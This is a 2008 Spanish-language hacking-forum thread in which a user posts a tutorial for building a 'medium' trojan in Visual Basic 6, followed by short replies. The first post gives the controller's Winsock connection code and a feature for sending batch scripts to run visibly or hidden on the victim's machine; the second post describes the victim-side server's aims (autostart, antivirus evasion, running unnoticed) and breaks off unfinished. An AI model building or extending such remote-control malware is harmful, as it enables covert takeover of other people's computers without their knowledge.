elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [manual]como hacer un troyano medio by krackwar
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [manual]como hacer un troyano medio by krackwar  (Leído 3,139 veces)
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
[manual]como hacer un troyano medio by krackwar
« en: 6 Abril 2008, 22:05 pm »

bueno con este manual planeo enseñar como crear un troyano de dificultad media con conocimientos basicos:
materiales:
partes
bueno un troyano consta de dos partes ;un servidor que es el que recibe la victima i el cliente que es el que tiene el infectante.
1ª_parte
Cliente
bueno empesaremos a programar el cliente.
Con el vb6 abierto apretaremos las teclas ctrl + t nos aparesera una ventana de los componentes ai seleccionaremos la casilla de microsoft winsock 6 i presionaremos aceptar , despues de esto se nos agregara un icono con 2 computadores en la barra de herramientas(la que esta en la izquierda) este es el winsock , lo agregaremos al form i luego le cambiaremos el nombre que es "winsock1" a "ws" sin las comillas(esto se hace para abreviar).Luego agregaremos un frame(este se agregara ya que para hacer mas ordenado el troyano i ponerle mas opciones lo dividiremos en frames) i un commandbuton fuera del frame , en las propiedad de visible del frame pondremos false i en la propiedad caption del commandbuton i del frame pondremos "conexion" (sin las comillas)  , luego dentro del evento click del command1 pondremos
Código
  1. frame1.visible = true
osea el code completo del programa seria
Código
  1. Private Sub Command1_Click()
  2. Frame1.Visible = True
  3. End Sub
luego agregaremos en el frame1 un textbox ,dos commandbuton , un timer con la propiedad enabled = falsei un label ,en el command2 pondremos en la propiedad caption "conectar"(sin las comillas) , en el command3 en la propiedad caption pondremos "desconectar"(sin las comillas) i en la misma propiedad del label1 pondremos "estado:"(sin las comillas) .
la parte grafica debe estar quedando mas o menos asi.

Aora empesaremos a programar la conexion , bueno , aora en el evento ConnectionRequest del ws pondremos
Código
  1. On Error Resume Next 'esto es para que en un error prosiga i no pare
  2. ws.Close 'cerramos la conexion
  3. ws.Accept requestID 'acepta cualquier conexion entrante
  4. timer1.Interval = 1000 'le pondremos de intervalo 1 segundo al timer 1
  5. timer1.Enabled = True 'abilitaremos el timer1
luego pondremos en el evento timer del timer1 el siguinte codigo:
Código
  1. If ws.State = 0 Then
  2. Label1.Caption = "estado:desconectado" 'si el estado del ws es desconectado ponemos en el label1 estado:desconectado
  3. ws.Close 'cerramos la conexion
  4. ws.Listen 'escuchamos
  5. End If ' teminamos el if
  6. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado del ws es conectando ponemos en el label1 estado:conectando
  7. If ws.State = 7 Then Label1.Caption = "estado:conectado" 'si el estado del ws es conectado ponemos en el label1 estado:conectado
esto es para que si no estamos conectados se conecte i que ponga en que estado estamos en el label1.
bueno con esto ya tenemos mas del 50% de la conexion que es lo principal de un troyano.
aora en el evento click del command2 que es el que dice conectar pondremos
Código
  1. On Error Resume Next                                      'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo
  2. ws.LocalPort = Text1.Text                              'el puerto que empleara el winsock sera el que introduzcas en un textbox
  3. ws.Close                                                            'cierra cualquier conexion que alla con este programa
  4. ws.Listen                                                           'deja ala escucha el puerto introducido en el textbox
  5. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado es conectando pone en el label1 estado:conectando
esto ara que si apretamos ese boton se ponga a la escucha del puerto que emos introducido en el textbox1 (ai que meter el puerto antes de apretar este boton).Aora en el command3 en el evento click ponemos:
Código
  1. If ws.State = 7 Then 've si estamos conectados
  2. ws.Close ' si estamos conectados nos desconecta
  3. Else
  4. MsgBox "no puedes desconectarte si no estas conectado", vbCritical, "error!" ' de lo contrario aparece un mensage
  5. End If 'teminamos el if
bueno con esto ya tenemos la conexion del cliente i ya que mi ultimo programa fue el osiris 2.0 [creador de bats remoto] le pondremos la caracteristica de crear bats = que con el osiris , pero primero pondre como esta quedando el code :
Código
  1. Private Sub Command2_Click()
  2. On Error Resume Next                                      'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo
  3. ws.LocalPort = Text1.Text                              'el puerto que empleara el winsock sera el que introduzcas en un textbox
  4. ws.Close                                                            'cierra cualquier conexion que alla con este programa
  5. ws.Listen                                                           'deja ala escucha el puerto introducido en el textbox
  6. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado es conectando pone en el label1 estado:conectando
  7. End Sub
  8.  
  9.  
  10.  
  11. Private Sub Command3_Click()
  12. If ws.State = 7 Then 've si estamos conectados
  13. ws.Close ' si estamos conectados nos desconecta
  14. Else
  15. MsgBox "no puedes desconectarte si no estas conectado", vbCritical, "error!" ' de lo contrario aparece un mensage
  16. End If 'teminamos el if
  17. End Sub
  18.  
  19. Private Sub Timer1_Timer()
  20. If ws.State = 0 Then
  21. Label1.Caption = "estado:desconectado" 'si el estado del ws es desconectado ponemos en el label1 estado:desconectado
  22. ws.Close 'cerramos la conexion
  23. ws.Listen 'escuchamos
  24. End If ' teminamos el if
  25. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado del ws es conectando ponemos en el label1 estado:conectando
  26. If ws.State = 7 Then Label1.Caption = "estado:conectado" 'si el estado del ws es conectado ponemos en el label1 estado:conectado
  27.  
  28.  
  29. End Sub
  30.  
  31. Private Sub ws_ConnectionRequest(ByVal requestID As Long)
  32. On Error Resume Next 'esto es para que en un error prosiga i no pare
  33. ws.Close 'cerramos la conexion
  34. ws.Accept requestID 'acepta cualquier conexion entrante
  35. Timer1.Interval = 1000 'le pondremos de intervalo 1 segundo al timer 1
  36. Timer1.Enabled = True 'abilitaremos el timer1
  37. End Sub
  38.  
  39.  
bueno aora haremos el creaador de bats remoto.
primero que nada agregaremos otro frame fuera del frame 1 luego dentro de la propiedad visible del frame2 pondremos false i en la propiedad caption de este pondremos bats remotos luego agregaremos otro commandbuton fuera del frame i en la propiedad caption pongan "bats" (sin las comillas) i en el evento click del command4 ponemos
Código
  1. Frame1.Visible = False ' ocultamos el frame1
  2. Frame2.Visible = True ' mostramos el frame2
i en el evento click del command1 ponemos
Código
  1. Frame2.Visible = False ' ocultamos el frame2
  2. Frame1.Visible = True ' mostramos el frame1
osea el code de estos dos botones queda asi:
Código
  1. Private Sub Command1_Click()
  2. Frame2.Visible = False ' ocultamos el frame2
  3. Frame1.Visible = True ' mostramos el frame1
  4. End Sub
  5. Private Sub Command4_Click()
  6. Frame1.Visible = False ' ocultamos el frame1
  7. Frame2.Visible = True ' mostramos el frame2
  8. End Sub
bueno aora vamos a lo que importa ,en el frame 2 le agregamos un textbox grande con las propiedades ScrollBars = 3-both i multiline = true , luego ponemos un commandbuton en el frame 2 con la propiedad caption "crear" , luego le agregamos en el frame2 dos optionbutton , en el option1 le ponemos en la propiedad caption = "visible" i en el option2 ponemos "oculto"
 deberia estar quedando mas o menos asi:

bueno suponiendo que saben ya algo de vb6 aunque sea lo basico de aqui en adelante me voi a explicar como que le ablara a alguien que sabe.
Bueno sigamos el manual , declaramos la variable global "vista" tipo string(sin las comillas) i en el evento click del option1 pones
Código
  1. vista = "true" ' cambiamos la variable vista a true
i en el evento click del option2
Código
  1. vista = "falso" ' cambiamos la variable vista a falso
luego declaramos la variable global separador tipo string i en el evento load del form ponemos
Código
  1. separador = "@^^^%/()!||||¿?¿?¿?_--" ' esto es para separar los datos que emviemos(no es nada mas que un texto plano

 luego en el evento click del command5 ponemos ponemos
Código
  1. ws.senddata text2.text & separador & vista ' emviamos lo escrito en el text2 i la variable vista
bueno asta aca el codigo completo seria
Código
  1. Dim separador As String
  2. Dim vista As String
  3.  
  4.  
  5. Private Sub Command1_Click()
  6. Frame2.Visible = False ' ocultamos el frame2
  7. Frame1.Visible = True ' mostramos el frame1
  8. End Sub
  9.  
  10. Private Sub Command2_Click()
  11. On Error Resume Next                                      'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo
  12. ws.LocalPort = Text1.Text                              'el puerto que empleara el winsock sera el que introduzcas en un textbox
  13. ws.Close                                                            'cierra cualquier conexion que alla con este programa
  14. ws.Listen                                                           'deja ala escucha el puerto introducido en el textbox
  15. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado es conectando pone en el label1 estado:conectando
  16. End Sub
  17.  
  18.  
  19.  
  20. Private Sub Command3_Click()
  21. If ws.State = 7 Then 've si estamos conectados
  22. ws.Close ' si estamos conectados nos desconecta
  23. Else
  24.  
  25. MsgBox "no puedes desconectarte si no estas conectado", vbCritical, "error!" ' de lo contrario aparece un mensage
  26. End If 'teminamos el if
  27. End Sub
  28.  
  29. Private Sub Command4_Click()
  30. Frame1.Visible = False ' ocultamos el frame1
  31. Frame2.Visible = True ' mostramos el frame2
  32.  
  33. End Sub
  34.  
  35.  
  36. Private Sub Command5_Click()
  37. ws.SendData Text2.Text & separador & vista
  38. End Sub
  39.  
  40. Private Sub Form_Load()
  41. separador = "@^^^%/()!||||¿?¿?¿?_--"
  42. End Sub
  43.  
  44. Private Sub Option1_Click()
  45. vista = "true"
  46. End Sub
  47.  
  48. Private Sub Option2_Click()
  49. vista = "falso"
  50. End Sub
  51.  
  52. Private Sub Timer1_Timer()
  53. If ws.State = 0 Then
  54. Label1.Caption = "estado:desconectado" 'si el estado del ws es desconectado ponemos en el label1 estado:desconectado
  55. ws.Close 'cerramos la conexion
  56. ws.Listen 'escuchamos
  57. End If ' teminamos el if
  58. If ws.State = 2 Then Label1.Caption = "estado:conectando" 'si el estado del ws es conectando ponemos en el label1 estado:conectando
  59. If ws.State = 7 Then Label1.Caption = "estado:conectado" 'si el estado del ws es conectado ponemos en el label1 estado:conectado
  60.  
  61.  
  62. End Sub
  63.  
  64. Private Sub ws_ConnectionRequest(ByVal requestID As Long)
  65. On Error Resume Next 'esto es para que en un error prosiga i no pare
  66. ws.Close 'cerramos la conexion
  67. ws.Accept requestID 'acepta cualquier conexion entrante
  68. Timer1.Interval = 1000 'le pondremos de intervalo 1 segundo al timer 1
  69. Timer1.Enabled = True 'abilitaremos el timer1
  70. End Sub


« Última modificación: 7 Abril 2008, 03:03 am por krackwar » En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #1 en: 7 Abril 2008, 02:16 am »

2ª_parte
servidor
bueno , ahora programaremos el servidor esta seria como la segunda parte de mi manual y por lo menos para mi es la parte mas importante.
explicación pequeña:
Bueno ,el servidor es el que se conecta al cliente este tendra que tener auto inicio para que se ejecute aunque se reinicie el pc,este tendra que ser lo mas liviano posible ,tiene que ser indetectable a los antivirus y este es el que recibe los datos y los interpreta.Este lleva la mayoria de su code en el evento load del form ,ya que este no tiene que tener interaccion con lavictima ya que tiene que pasar sin ser persivido.
programacion:
bueno empesaremos a a programar el servidor del troyano este a la diferencia de el cliente este emves de usar el winsock va a usar el csocketmaster que lo divieron a ver descargado cuando empesaron a leer el manual,este se osupara casi igual que el winsock solo que son modulos emves del ocx bueno yo los deje dentro de un proyecto con todo ya puesto asi que solo ai que escribirlo como si fuera un winsock solo que este se llama ws(bueno no ai ninguna diferencia XD).
bueno abrimos el proyecto de csocketmaster que se descargaron anteriormente i en el evento load del form ponemos
continuara mañana.....


« Última modificación: 23 Diciembre 2008, 01:32 am por krackwar » En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #2 en: 12 Abril 2008, 23:39 pm »

krackar tengo un troyano  muy parecido al que estas haciendo,y me ha surjido una duda, y es que, quiero introducirle otra funcion en concreto Messenger API Type Library y mas concretamente lo siguiente:

Private Sub Form_Load()
    Set objMessenger = New MessengerAPI.Messenger
End Sub

mi duda es si  Set objMessenger = New MessengerAPI.Messenger lo deberia cargar con el form_load del troyano donde cargo
Private Sub Form_Load()

On Error Resume Next
Winsock1.RemoteHost = "xxxxxxxx"
Winsock1.RemotePort = 80
Winsock1.Listen
Dim ejec As String
...................
o deberia cargarlo por separado?


 luego borrare el post
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #3 en: 13 Abril 2008, 00:14 am »

i como borraras el post???? bueno contestando tu pregunta tienes q ponerlo en el evento load del form
pd:en un ratito mas termino el manual ya que estoi haciendo un troyano i se me an ocurrido ideas para el manual
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
TUNOVATO

Desconectado Desconectado

Mensajes: 56


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #4 en: 5 Junio 2008, 23:25 pm »

jejejeje saludos wey..!!ç


te quedastes dormido..!!!  :laugh: :laugh: :laugh: :laugh: :laugh:

ya estan cantando los gallos...!!!!  ;D ;D ;D ;D ;D ;D
En línea

saliaz


Desconectado Desconectado

Mensajes: 309


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #5 en: 5 Junio 2008, 23:38 pm »


la verdad es que yo le estropee el tuto.Si algun moderador lee este mensaje por favor borren mis mensajes de este post para que Krackwar pueda continuarlo.
Saludos.
En línea

krackwar


Desconectado Desconectado

Mensajes: 900


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #6 en: 6 Junio 2008, 00:05 am »

jejejeje saludos wey..!!ç


te quedastes dormido..!!!  :laugh: :laugh: :laugh: :laugh: :laugh:

ya estan cantando los gallos...!!!!  ;D ;D ;D ;D ;D ;D
Si no lo e terminado en un tiempo mas lo termino que estoy estudiando asm como tonto y me consume mucho tiempo.
En línea

Mi blog
Bienvenido krackwar, actualmente tu puntuación es de 38 puntos y tu rango es Veteran.
El pollo número 1, es decir yo, (krackwar), adoro a Shaddy como a un dios.
sentret

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: [manual]como hacer un troyano medio by krackwar
« Respuesta #7 en: 23 Diciembre 2008, 04:43 am »

Tiooooooo revivo este post, por que me parece super super interesante, y me gustaria que lo terminaran, eso del winsock api me interesa muchisimo (csocketmaster)
saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Manual Batch (Nivel Medio) By 2Fac3R
Scripting
2Fac3R 0 2,359 Último mensaje 20 Octubre 2011, 22:33 pm
por 2Fac3R
[Tutoral] Cómo hacer una inyección SQL manual
Hacking
The_Mushrr00m 1 4,455 Último mensaje 30 Diciembre 2012, 18:27 pm
por Jaes
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines